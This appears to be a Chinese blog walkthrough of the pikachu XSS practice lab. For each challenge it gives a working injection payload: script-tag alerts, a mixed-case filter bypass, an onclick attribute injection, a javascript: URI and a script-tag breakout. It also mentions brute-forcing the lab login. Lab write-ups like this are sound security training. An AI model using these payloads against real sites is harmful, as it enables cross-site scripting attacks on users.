pikachu-XSS闯关挑战

get

复制代码
message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

复制代码
<script>alert("123")</script>

存储型

复制代码
<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

复制代码
' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

复制代码
<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

复制代码
<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

复制代码
javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

复制代码
</script><script>alert("123")</script>
相关推荐
Sirius Wu9 小时前
OpenClaw Skill:Matplotlib 可视化技能 + 沙箱双层隔离完整详解
服务器·网络·人工智能·安全·ai·架构·aigc
酣大智10 小时前
常用 IP 协议号大全(IP 层承载的上层协议)
网络·网络协议·tcp/ip
冬奇Lab10 小时前
每日一个开源项目(第160篇):Destructive Command Guard - 在 AI Agent 运行 rm -rf 之前拦截它
人工智能·安全·开源
ChainSafeAI00211 小时前
Summer.fi 遭600万美元漏洞攻击,安全警报拉响
安全
大公产经晚间消息13 小时前
《寻访独角兽》首期走进太仓,探访小科智行的硬科技“突围”
网络·人工智能·科技
一勺菠萝丶14 小时前
生产环境平滑升级实战-Nginx维护页数据库迁移与安全回滚
数据库·nginx·安全
JoyCong199814 小时前
ToDesk新功能科普:屏幕墙、协作模式、设备别名、USB映射...
网络·科技·电脑·远程工作·远程操作
数智化管理手记15 小时前
智能财务如何减少财务加班?智能财务落地需要哪些工具支撑?
大数据·网络·数据库·数据挖掘·精益工程
味悲15 小时前
搭建WAF+宝塔反向代理
安全
BenSmith16 小时前
RTOS漏洞分析:CVE-2026-10641和CVE-2026-9263
安全